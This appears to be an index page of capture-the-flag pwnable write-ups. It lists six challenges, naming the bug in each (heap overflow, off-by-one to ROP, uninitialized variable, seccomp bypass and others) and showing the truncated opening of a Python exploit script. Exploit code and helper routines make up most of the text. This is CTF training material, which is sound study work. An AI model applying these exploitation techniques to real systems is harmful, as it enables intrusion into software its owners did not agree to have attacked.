Category : pwnable Summary : lua script, oob, integer overflow Exploit#!/usr/bin/python from pwn import * import sys s = process('./grunt') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send script = ''' -- Lukachu -- Hannobat -- Andyball -- Airmackly function trigger(obj) pokemon.swapAttack(obj, 0, 1) -- 1 2 pokemon.duplicateAttack(obj) -- 1 2 2 end local ..

Category : pwnable Summary : bypass seccomp, close(0x8000000000000002), overwrite parent process memory Exploit#!/usr/bin/python from pwn import * s = process('./tea') ru = s.recvuntil rl = s.recvline rr = s.recv rg = s.recvregex sl = s.sendline ss = s.send def parse_maps(maps): res = {} get_base = lambda x : int(x.split('-')[0], 16) for line in maps.splitlines(): if 'r-x' in line and 'libc' in ..

Category : pwnable Summary : uninitialized variable Exploit#!/usr/bin/python from pwn import * def cmd_polish_sum(nums): ru('> ') sl(str(2)) ru('Operator: ') sl('S') for i in range(len(nums)): ru('Operand: ') sl(str(nums[i])) ru('Operand: ') sl('.') rl() def cmd_sign(num): ru('> ') sl(str(5)) sl(str(num)) def cmd_read_note(): ru('> ') sl(str(1)) ru('Your note: ') note = rl(False) return note s =..

Category : pwnable Summary : heap overflow Exploit#!/usr/bin/python from pwn import * def cmd_add(alloc_size, input_size, name, data): ru('Action') sl(str(0)) ru('size of description: ') sl(str(alloc_size)) ru('name: ') sl(name) ru('text length: ') sl(str(input_size)) ru('text: ') sl(data) def cmd_del(idx): ru('Action') sl(str(1)) ru('index: ') sl(str(idx)) def cmd_show(idx): ru('Action') sl(str..

Category : Pwnables Summary : off by one to rop, setjmp Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res #def ror64(value, count): def ROR(data, shift, size=64): shift %= size body = data >> shift remains = (data

Category : Pwnables Summary : memory leak with SSP protection Exploit #!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res p = lambda x : pack("